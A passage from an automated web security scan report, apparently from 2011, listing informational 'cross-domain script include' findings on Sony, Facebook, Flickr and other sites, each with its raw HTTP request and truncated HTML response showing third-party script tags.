Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLWwFb0wAToHaWQiJTJhY2JhYzVmNTU0YjJj%250AYmZhNWMyNDRmNDVkODk5OGIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8c7fe27671279233551b5c47933be7b27d397a15; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1308769086/javascripts/twitter.js?1308259133" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1308769086/javascripts/lib/jquery.tipsy.min.js?1308259133" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1308769086/javascripts/lib/gears_init.js?1308259133" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1308769086/javascripts/lib/mustache.js?1308259133" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1308769086/javascripts/geov1.js?1308259132" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1308769086/javascripts/api.js?1308259132" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1308769086/javascripts/lib/mustache.js?1308259133" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1308769086/javascripts/dismissable.js?1308259132" type="text/javascript"></script>
...[SNIP]...

11.3. http://us.playstation.com/psn/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.playstation.com
Path:   /psn/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /psn/ HTTP/1.1
Host: us.playstation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:34 GMT
Server: Apache
Last-Modified: Wed, 08 Jun 2011 20:21:19 GMT
ETag: "b2058a-f02f-4a539144aadc0"
Accept-Ranges: bytes
Content-Length: 61487
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: SONYCOOKIE1=2741283008.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">    <head><meta http-equi
...[SNIP]...
<!-- Added javascript for site catalyst and T&T integration -->            <script type="text/javascript" src="http://webassetsg.scea.com/pscomauth/groups/public/documents/webasset/ps_mbox_js.js"></script>
...[SNIP]...
<!-- end -->         <script type="text/javascript" src="http://webassetsh.scea.com/pscomauth/groups/public/documents/webasset/swfobject.js" charset="utf-8"></script>        <script type="text/javascript" src="http://webassetsi.scea.com/pscomauth/groups/public/documents/webasset/ps_jquery-1.3.2.min_js.js" charset="utf-8"></script>        <script type="text/javascript" src="http://webassetsj.scea.com/pscomauth/groups/public/documents/webasset/pscommon.js"></script>                        <script type="text/javascript" src="http://webassets.scea.com/pscomauth/groups/public/documents/webasset/usps_ga_code.js"></script>
...[SNIP]...
</script>                <script type="text/javascript" src="http://webassetsb.scea.com/pscomauth/groups/public/documents/webasset/ps_fx_js.js" charset="utf-8"></script>        <script type="text/javascript" src="http://webassetsc.scea.com/pscomauth/groups/public/documents/webasset/ps_uspsglobal_js.js" charset="utf-8"></script>
...[SNIP]...
</div> <script type="text/javascript" src="http://webassetsa.scea.com/pscomauth/groups/public/documents/webasset/ps_login_js.js" charset="utf-8"> </script>
...[SNIP]...
<!-- SS_BEGIN_SNIPPET(fragment5,2)-->                <script type="text/javascript" src="http://webassetsb.scea.com/pscomauth/groups/public/documents/webasset/jquery_tools_min.js"></script><script type="text/javascript" src="http://webassetsc.scea.com/pscomauth/groups/public/documents/webasset/ps_tick_combined_js.js"></script><script type="text/javascript" src="http://webassetsd.scea.com/pscomauth/groups/public/documents/webasset/ticker.js"></script>
...[SNIP]...
<div id="tickerItemHolder">        <script type="text/javascript" src="http://webassetse.scea.com/pscomauth/groups/public/documents/webasset/ps_ticker_js.js">        </script>
...[SNIP]...
</div> <script type="text/javascript" src="http://webassetsf.scea.com/pscomauth/groups/public/documents/webasset/usps_s_code.js"></script>
...[SNIP]...
<!-- End of DoubleClick Floodlight Tag: Please do not remove -->                <SCRIPT type="text/javascript" src="http://webassetsg.scea.com/pscomauth/groups/public/documents/webasset/ps_mbox_js.js"></script>
...[SNIP]...

11.4. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cyberghostvpn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.131.25
X-Cnection: close
Date: Thu, 23 Jun 2011 15:25:28 GMT
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/fKYLFU6W_MM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/Juua_Gv7yKY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/XhueOm5bqOx.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/PD7V_khohjs.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/NMbCdi3OCeH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/SogayxsfDSh.js"></script>
...[SNIP]...

11.5. http://www.facebook.com/sonyelectronics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sonyelectronics

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=jVkDTsgSBkZEpRPRjIw6e36G; expires=Sat, 22-Jun-2013 15:19:41 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rLE1G; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.37
Connection: close
Date: Thu, 23 Jun 2011 15:19:41 GMT
Content-Length: 169018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y0/r/Q9FznRzxmjD.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/Juua_Gv7yKY.js"></script>
...[SNIP]...

11.6. http://www.flickr.com/groups/sonycameraclub  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /groups/sonycameraclub HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=0jlvl41706mcf&b=3&s=ij; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:43 GMT; path=/; domain=.flickr.com
X-Served-By: www56.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82289

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...
</script>


                                   <script src="http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm7&amp;j/.GD/3.3.0/.FN/.FN-.E.A.vSKm7"></script>
...[SNIP]...

11.7. http://www.flickr.com/groups/sonycameraclub/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /groups/sonycameraclub/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=7i1m6g1706mce&b=3&s=ot; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:42 GMT; path=/; domain=.flickr.com
X-Served-By: www108.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82290

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...
</script>


                                   <script src="http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm7&amp;j/.GD/3.3.0/.FN/.FN-.E.A.vSKm7"></script>
...[SNIP]...

11.8. http://www.huddletogether.com/projects/lightbox2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /projects/lightbox2/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   
   <title>Lightbox 2<
...[SNIP]...
<!-- end #content -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

11.9. http://www.omnitechsupport.com/about.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /about.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.4.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32487

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

11.10. http://www.omnitechsupport.com/spyware_removal.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /spyware_removal.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /spyware_removal.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.3.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42222

<html>
<head>
<title>Spyware Removal | Spyware Adware Remove</title>
<meta name="description" content="Omnitechsupport.com offers complete 24/7 spyware removal services and effective spyware adware
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

11.11. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:48 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6il6pfh1t07e7jh9gcmfdeis73; expires=Sat, 16-Jul-2011 18:53:08 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 23 Jun 2011 15:16:06 GMT
ETag: "73be9325b7928055d2f550e7dc22f698"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

11.12. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&identifier=S_SonyStyle_Stores HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 82841
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:00 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 82841


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<link rel="canonical" href="http://www.sonystyle.com/c/S_SonyStyle_Stores/e
...[SNIP]...
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.13. http://www.sonystyle.com/webapp/wcs/stores/servlet/ContentDisplayView  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/ContentDisplayView

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/ContentDisplayView HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 72229
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:02 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 72229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.14. http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/OrderItemDisplay HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 92869
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=xRu1VrtkgP52lzARnuVxGqRnJ6o%3d%0a%3b2011%2d06%2d23+11%3a19%3a58%2e856%5f1308841107995%2d82466%5f10151%5f241903395%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:58 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903395=241903395%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cP6bHMHjytG71reM2szqU9sVaoSplcv4qC13K3MxVyVffFlubAypUsqxwsrdjgGwciI7t%2bmUJpOpQ%0awCZ7N%2bxU8GRW1M9qkUX1QRYnKOeclHhUzZiuZ4Ag7kJUtfEcbEI83mX7QHMCV3dEPblR56Avsg%3d%3d; Path=/
Set-Cookie: TS5bbf46=629bbaf3a13ad4191c8387200e85cb355e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e31c595fb302859d4; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 92869


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- hostname: saiadsapp22 -->
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.15. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/SYNewsletterOptInView HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 76256
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:16 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 76256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!---->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.16. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYSiteMapView  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYSiteMapView

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/SYSiteMapView HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 162795
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:09 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 162795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.17. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYWishListDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/SYWishListDisplay HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 73255
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:19:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: WC_PERSISTENT=NcxPoQ35T9OIG2xvyDBqCI7m%2f6I%3d%0a%3b2011%2d06%2d23+11%3a19%3a56%2e636%5f1308841107995%2d82466%5f10151%5f241903389%2c%2d1%2cUSD%5f10151; Expires=Tue, 20 Dec 2011 15:19:56 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_241903389=241903389%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c7myjYVzeSmGi%2bSmSHBDsv5QE%2fLHtPO66u%2fvUa%2fYlSe5zgSuFTJCb5MP4YHwzkoVFU539TML12c%2fn%0aUvMgKy33JgbQLeMW1w%2b5FRcSl5w0xRgy7RkTPOUihpdheDWGKGdU5kOAsbyKsSyrEcwSZhZUfA%3d%3d; Path=/
Set-Cookie: TS5bbf46=4315494d6d4225f09c2745a0fa6895375e46b2c7608495f34e0358cadb2332024890f70e222f7b4e4890f70e471aa5e16f42170c; Path=/
Cache-Control: private
Pragma: no-cache
Content-Length: 73255


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.18. http://www.sonystyle.com/webapp/wcs/stores/servlet/SearchCatalog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/SearchCatalog HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 92979
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:18 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 92979


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

11.19. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480

Response

HTTP/1.1 200 OK
ntCoent-Length: 93671
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 93671
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:08 GMT
Connection: close
Cache-Control: private

